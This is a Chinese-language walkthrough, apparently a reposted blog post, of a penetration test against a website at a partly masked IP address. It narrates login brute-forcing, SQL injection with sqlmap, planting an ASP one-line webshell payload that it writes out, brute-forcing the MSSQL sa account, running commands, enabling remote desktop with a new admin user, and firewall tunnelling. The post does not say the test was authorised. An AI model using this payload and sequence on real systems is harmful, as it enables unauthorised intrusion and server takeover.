一次完整的滲透測試


目標網站:39.xxx.xxx.xxx

 

 一階段前台測試:

1、前台存在登陸入口且無驗證碼(肯定要暴力破解啊)

2、前台url參數處加敏感字符數據庫報錯存在sql注入

3、前台登陸處輸入危險字符,數據庫報錯存在post注入

測試結果如下:

暴力破解獲得

用戶名:admin

密碼:123456

 

 

 

 

利用sqlmap跑注入並沒有跑出任何數據

只能登陸看一下了

 

 

二、登陸前台測試

利用前台的會員登陸發現有使用第三方編輯器(並沒有找到可利用漏洞)

存在xss漏洞

存在sql注入漏洞

 

 

 

 

 

 

 

 

 

 

 

 在登陸的狀態下繼續進行sql注入(burp  copyto file )發現跑出來一個表

 

 

 

 

 

 

 只跑出了當前賬戶和一個同級賬戶

到這里看了眼后台還是一臉懵逼

 

 

 

三、黑盒已經不好搞了,下載同類CMS

搭建環境擼一把

把相同源碼cms數據庫表名

將對應表明加入sqlmap庫中

路徑:sqlmap/txt/common-tables.txt

(表名一定要放前邊放最后要跑一年的)

繼續sqlmap跑、

 

 

 

 成功進入后台

 

四、getshell


進入后台之后發現編輯器兩個

文件上傳白名單,試了很久,基本行不通了

后台依舊存在XSS漏洞(這里的XSS可以利用拿到后台管理員cookie)

 

 

 搞了半天發現又遇到瓶頸了

再去擼一把源碼

發現當更新緩存的時候,根目錄下多了一個HTML文件修改html文件后發現報錯

在后台參數配置處修改配置發現報錯

審查代碼發現代碼漏洞

 

 

anxi

 

nMall.basic.asp是一個ASP文件考慮寫入一句話

本地構造payload(這里隨便改點東西網站就癱了如果在目標網站那肯定涼涼了)

"%> <%eval request ("pass")%> <%'
這里原有的郵箱 只能閉合 不能刪掉,不然數據庫會錯誤

 

 

 

 

 

菜刀連接、

 

 

 

 五、提權、

 nmap掃描發現目標開放1433端口

msf對1433端口sa進行爆破

 

爆破成功

mssql賬號和密碼為:sa /123456

使用msf命令執行模塊,執行最終的dos命令

use auxiliary/admin/mssql/mssql_exec

開啟3389端口並且建立管理用戶以后

利用HTTP隧道進行連接3389(繞過防火牆)

詳細方法見下面的網址

https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html

另外可以

通過MSFVenom生成exe后門木馬拿shell()

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM